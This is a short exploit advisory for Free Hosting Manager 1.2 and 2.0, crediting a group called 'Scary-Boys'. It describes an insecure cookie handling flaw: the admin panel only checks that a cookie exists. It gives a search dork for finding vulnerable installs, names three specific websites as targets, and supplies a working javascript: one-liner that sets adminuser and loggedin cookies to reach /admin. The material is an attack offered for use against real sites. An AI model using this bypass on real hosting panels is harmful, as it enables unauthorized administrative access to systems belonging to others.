1. Search: "Powered by free host manage"
2. Chose 1 website http://mashro3nahost.com/index.php ( Video )
OR: http://logon2host.net/ http://zikzuk.net/
3. javascript:document.cookie = "adminuser=1; path=/"; document.cookie = "loggedin=1;
path=/";
########################################################################## ##Free Hosting Manager = 1.2 & 2.0 Insecure Cookie Handling Vulnerability## ########################################################################### ## AUTHOR : Scary-Boys ## HOME : http://scary-boys.com ## Founded By : lvlr-Erfan ## Download : http://www.fhm-script.com/download.php ## ########################################################################### ## DorKs : "Powered By Free Hosting Manager" ## ########################################################################### ## DESCRIPTION : ## the admin panel only checks if the cookie exists. ## ########################################################################### ## Vulnerability : ## ## javascript:document.cookie = "adminuser=1; path=/"; document.cookie = "loggedin=1; path=/";# ########################################################################### ## after running the javascript, Go to "/admin" & Refresh ## ##########################################################################
